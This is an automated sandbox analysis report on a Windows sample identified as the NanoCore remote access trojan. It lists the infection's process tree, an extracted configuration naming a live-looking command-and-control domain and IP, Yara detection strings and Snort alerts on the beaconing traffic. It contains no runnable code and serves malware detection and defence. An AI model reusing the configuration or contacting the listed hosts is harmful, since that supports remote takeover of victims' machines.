Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
xeWd55M5Lb

Overview

General Information

Sample Name:xeWd55M5Lb (renamed file extension from none to exe)
Analysis ID:628188
MD5:f32d1f6e94da654932e73e42f0f4773a
SHA1:04e51bb4dedfc85cb6d4dfceb3bf48bf69c2a58a
SHA256:43f670b439ef8ea9765ef3a61e84f1997e3dfd30067dc11c3203caf258553398
Tags:32exe
Infos:

Detection

Nanocore
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: NanoCore
Detected Nanocore Rat
Multi AV Scanner detection for dropped file
Yara detected Nanocore RAT
Snort IDS alert for network traffic
Machine Learning detection for sample
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses dynamic DNS services
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64
  • xeWd55M5Lb.exe (PID: 6384 cmdline: "C:\Users\user\Desktop\xeWd55M5Lb.exe" MD5: F32D1F6E94DA654932E73E42F0F4773A)
    • jqenyeo.exe (PID: 6412 cmdline: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk MD5: 22A5EC1E72CE0D23B1598C40639BB3B2)
      • conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • jqenyeo.exe (PID: 6500 cmdline: C:\Users\user\AppData\Local\Temp\jqenyeo.exe C:\Users\user\AppData\Local\Temp\hjmxlwxk MD5: 22A5EC1E72CE0D23B1598C40639BB3B2)
  • ltqmdmdi.exe (PID: 6696 cmdline: "C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe" MD5: 22A5EC1E72CE0D23B1598C40639BB3B2)
    • conhost.exe (PID: 6768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 7004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6696 -s 628 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • ltqmdmdi.exe (PID: 5948 cmdline: "C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exe" MD5: 22A5EC1E72CE0D23B1598C40639BB3B2)
    • conhost.exe (PID: 5420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 4588 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 608 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup
{"Version": "1.2.2.0", "Mutex": "b07368c6-c9e6-43bc-939d-00b8dbf6", "Group": "Memphis", "Domain1": "stonecold.ddns.net", "Domain2": "stonecold.ddns.net", "Port": 2702, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
SourceRuleDescriptionAuthorStrings
00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
  • 0x101e5:$x1: NanoCore.ClientPluginHost
  • 0x10222:$x2: IClientNetworkHost
  • 0x13d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
    00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmpNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
    • 0xff4d:$a: NanoCore
    • 0xff5d:$a: NanoCore
    • 0x10191:$a: NanoCore
    • 0x101a5:$a: NanoCore
    • 0x101e5:$a: NanoCore
    • 0xffac:$b: ClientPlugin
    • 0x101ae:$b: ClientPlugin
    • 0x101ee:$b: ClientPlugin
    • 0x100d3:$c: ProjectData
    • 0x10ada:$d: DESCrypto
    • 0x184a6:$e: KeepAlive
    • 0x16494:$g: LogClientMessage
    • 0x1268f:$i: get_Connected
    • 0x10e10:$j: #=q
    • 0x10e40:$j: #=q
    • 0x10e5c:$j: #=q
    • 0x10e8c:$j: #=q
    • 0x10ea8:$j: #=q
    • 0x10ec4:$j: #=q
    • 0x10ef4:$j: #=q
    • 0x10f10:$j: #=q
    00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
    • 0x101e5:$x1: NanoCore.ClientPluginHost
    • 0x10222:$x2: IClientNetworkHost
    • 0x13d55:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
    00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
      Click to see the 12 entries
      SourceRuleDescriptionAuthorStrings
      3.0.jqenyeo.exe.400000.4.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x217e5:$x1: NanoCore.ClientPluginHost
      • 0x21822:$x2: IClientNetworkHost
      • 0x25355:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
      3.0.jqenyeo.exe.400000.4.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x2155d:$x1: NanoCore Client.exe
      • 0x217e5:$x2: NanoCore.ClientPluginHost
      • 0x22e1e:$s1: PluginCommand
      • 0x22e12:$s2: FileCommand
      • 0x23cc3:$s3: PipeExists
      • 0x29a7a:$s4: PipeCreated
      • 0x2180f:$s5: IClientLoggingHost
      3.0.jqenyeo.exe.400000.4.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        3.0.jqenyeo.exe.400000.4.unpackMALWARE_Win_NanoCoreDetects NanoCoreditekSHen
        • 0x2154d:$x1: NanoCore Client
        • 0x2155d:$x1: NanoCore Client
        • 0x217a5:$x2: NanoCore.ClientPlugin
        • 0x217e5:$x3: NanoCore.ClientPluginHost
        • 0x2179a:$i1: IClientApp
        • 0x217bb:$i2: IClientData
        • 0x217c7:$i3: IClientNetwork
        • 0x217d6:$i4: IClientAppHost
        • 0x217ff:$i5: IClientDataHost
        • 0x2180f:$i6: IClientLoggingHost
        • 0x21822:$i7: IClientNetworkHost
        • 0x21835:$i8: IClientUIHost
        • 0x21843:$i9: IClientNameObjectCollection
        • 0x2185f:$i10: IClientReadOnlyNameObjectCollection
        • 0x215ac:$s1: ClientPlugin
        • 0x217ae:$s1: ClientPlugin
        • 0x21ca2:$s2: EndPoint
        • 0x21cab:$s3: IPAddress
        • 0x21cb5:$s4: IPEndPoint
        • 0x236eb:$s6: get_ClientSettings
        • 0x23c8f:$s7: get_Connected
        3.0.jqenyeo.exe.400000.4.unpackNanoCoreunknown Kevin Breen <kevin@techanarchy.net>
        • 0x2154d:$a: NanoCore
        • 0x2155d:$a: NanoCore
        • 0x21791:$a: NanoCore
        • 0x217a5:$a: NanoCore
        • 0x217e5:$a: NanoCore
        • 0x215ac:$b: ClientPlugin
        • 0x217ae:$b: ClientPlugin
        • 0x217ee:$b: ClientPlugin
        • 0x216d3:$c: ProjectData
        • 0x220da:$d: DESCrypto
        • 0x29aa6:$e: KeepAlive
        • 0x27a94:$g: LogClientMessage
        • 0x23c8f:$i: get_Connected
        • 0x22410:$j: #=q
        • 0x22440:$j: #=q
        • 0x2245c:$j: #=q
        • 0x2248c:$j: #=q
        • 0x224a8:$j: #=q
        • 0x224c4:$j: #=q
        • 0x224f4:$j: #=q
        • 0x22510:$j: #=q
        Click to see the 45 entries

        AV Detection

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\jqenyeo.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        E-Banking Fraud

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\jqenyeo.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Stealing of Sensitive Information

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\jqenyeo.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

        Remote Access Functionality

        barindex
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\jqenyeo.exe, ProcessId: 6500, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
        Timestamp:192.168.2.3185.19.85.1414977627022816766 05/17/22-12:14:39.410802
        SID:2816766
        Source Port:49776
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976827022025019 05/17/22-12:14:22.484039
        SID:2025019
        Source Port:49768
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976627022816766 05/17/22-12:14:10.385891
        SID:2816766
        Source Port:49766
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414975327022816766 05/17/22-12:13:17.032873
        SID:2816766
        Source Port:49753
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976127022025019 05/17/22-12:13:48.368799
        SID:2025019
        Source Port:49761
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414975827022025019 05/17/22-12:13:28.167370
        SID:2025019
        Source Port:49758
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976327022816766 05/17/22-12:14:04.353308
        SID:2816766
        Source Port:49763
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414974627022816766 05/17/22-12:13:08.303726
        SID:2816766
        Source Port:49746
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414977427022025019 05/17/22-12:14:28.783170
        SID:2025019
        Source Port:49774
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414975927022025019 05/17/22-12:13:35.677991
        SID:2025019
        Source Port:49759
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976227022025019 05/17/22-12:13:55.935835
        SID:2025019
        Source Port:49762
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414975927022816766 05/17/22-12:13:37.610009
        SID:2816766
        Source Port:49759
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:185.19.85.141192.168.2.32702497772841753 05/17/22-12:14:49.052826
        SID:2841753
        Source Port:2702
        Destination Port:49777
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414974627022816718 05/17/22-12:13:08.062740
        SID:2816718
        Source Port:49746
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976027022816766 05/17/22-12:13:43.986891
        SID:2816766
        Source Port:49760
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976627022816718 05/17/22-12:14:09.332904
        SID:2816718
        Source Port:49766
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414974627022025019 05/17/22-12:13:06.238856
        SID:2025019
        Source Port:49746
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414977427022816766 05/17/22-12:14:31.555929
        SID:2816766
        Source Port:49774
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414975327022025019 05/17/22-12:13:12.793529
        SID:2025019
        Source Port:49753
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414974327022025019 05/17/22-12:13:00.042311
        SID:2025019
        Source Port:49743
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976327022025019 05/17/22-12:14:02.189654
        SID:2025019
        Source Port:49763
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976827022816766 05/17/22-12:14:24.492812
        SID:2816766
        Source Port:49768
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414975827022816766 05/17/22-12:13:30.051681
        SID:2816766
        Source Port:49758
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976127022816766 05/17/22-12:13:50.122915
        SID:2816766
        Source Port:49761
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976627022025019 05/17/22-12:14:08.849775
        SID:2025019
        Source Port:49766
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414977627022025019 05/17/22-12:14:37.723918
        SID:2025019
        Source Port:49776
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414977727022816766 05/17/22-12:14:44.772947
        SID:2816766
        Source Port:49777
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976727022816766 05/17/22-12:14:17.723901
        SID:2816766
        Source Port:49767
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414975727022025019 05/17/22-12:13:21.755444
        SID:2025019
        Source Port:49757
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976027022025019 05/17/22-12:13:42.065696
        SID:2025019
        Source Port:49760
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414975727022816766 05/17/22-12:13:23.742694
        SID:2816766
        Source Port:49757
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976227022816766 05/17/22-12:13:57.882898
        SID:2816766
        Source Port:49762
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414976727022025019 05/17/22-12:14:15.714757
        SID:2025019
        Source Port:49767
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:185.19.85.141192.168.2.32702497582810290 05/17/22-12:13:29.940778
        SID:2810290
        Source Port:2702
        Destination Port:49758
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414974327022816766 05/17/22-12:13:01.734611
        SID:2816766
        Source Port:49743
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.3185.19.85.1414977727022025019 05/17/22-12:14:43.866227
        SID:2025019
        Source Port:49777
        Destination Port:2702
        Protocol:TCP
        Classtype:A Network Trojan was detected

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 1.2.jqenyeo.exe.21c1658.1.raw.unpackMalware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "b07368c6-c9e6-43bc-939d-00b8dbf6", "Group": "Memphis", "Domain1": "stonecold.ddns.net", "Domain2": "stonecold.ddns.net", "Port": 2702, "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}
        Source: xeWd55M5Lb.exeVirustotal: Detection: 49%Perma Link
        Source: xeWd55M5Lb.exeReversingLabs: Detection: 48%
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeReversingLabs: Detection: 23%
        Source: C:\Users\user\AppData\Roaming\mtmgxghqo\ltqmdmdi.exeReversingLabs: Detection: 23%
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21b0000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21c1658.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21b0000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 1.2.jqenyeo.exe.21c1658.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000000.285051410.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000000.287818975.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000001.00000002.290429738.00000000021B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 6412, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: jqenyeo.exe PID: 6500, type: MEMORYSTR
        Source: xeWd55M5Lb.exeJoe Sandbox ML: detected
        Source: 6.2.ltqmdmdi.exe.400000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
        Source: 17.0.ltqmdmdi.exe.400000.2.unpackAvira: Label: TR/Crypt.EPACK.Gen2
        Source: 17.2.ltqmdmdi.exe.400000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
        Source: 3.0.jqenyeo.exe.400000.6.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 3.0.jqenyeo.exe.400000.8.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 3.0.jqenyeo.exe.400000.4.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 3.0.jqenyeo.exe.400000.9.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 3.0.jqenyeo.exe.400000.7.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 17.0.ltqmdmdi.exe.400000.1.unpackAvira: Label: TR/Crypt.EPACK.Gen2
        Source: 1.2.jqenyeo.exe.400000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
        Source: 3.0.jqenyeo.exe.400000.5.unpackAvira: Label: TR/Dropper.MSIL.Gen7
        Source: 17.0.ltqmdmdi.exe.400000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
        Source: xeWd55M5Lb.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: C:\Users\user\AppData\Local\Temp\jqenyeo.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
        Source: xeWd55M5Lb.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
        Source: Binary string: wntdll.pdbUGP source: jqenyeo.exe, 00000001.00000003.285113865.00000000025B0000.00000004.00001000.00020000.00000000.sdmp, jqenyeo.exe, 00000001.00000003.281647167.0000000002740000.00000004.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: jqenyeo.exe, 00000001.00000003.285113865.00000000025B0000.00000004.00001000.00020000.00000000.sdmp, jqenyeo.exe, 00000001.00000003.281647167.0000000002740000.00000004.00001000.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B

        Networking

        barindex
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49743 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49743 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49746 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49746 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.2.3:49746 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49753 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49753 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49757 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49757 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49758 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49758 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 185.19.85.141:2702 -> 192.168.2.3:49758
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49759 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49759 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49760 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49760 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49761 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49761 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49762 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49762 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49763 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49763 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49766 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49766 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.2.3:49766 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49767 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49767 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49768 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49768 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49774 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49774 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49776 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49776 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49777 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.2.3:49777 -> 185.19.85.141:2702
        Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 185.19.85.141:2702 -> 192.168.2.3:49777
        Source: Malware configuration extractorURLs: stonecold.ddns.net
        Source: unknownDNS query: name: stonecold.ddns.net
        Source: Joe Sandbox ViewASN Name: DATAWIRE-ASCH DATAWIRE-ASCH
        Source: Joe Sandbox ViewIP Address: 185.19.85.141 185.19.85.141
        Source: global trafficTCP traffic: 192.168.2.3:49743 -> 185.19.85.141:2702
        Source: xeWd55M5Lb.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: unknownDNS traffic detected: queries for: stonecold.ddns.net
        Source: C:\Users\user\Desktop\xeWd55M5Lb.exeCode function: 0_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405809

        E-Banking Fraud

        barindex
        Source: Yara matchFile source: 3.0.jqenyeo.exe.400000.4.unpack, type: UNPACKEDPE
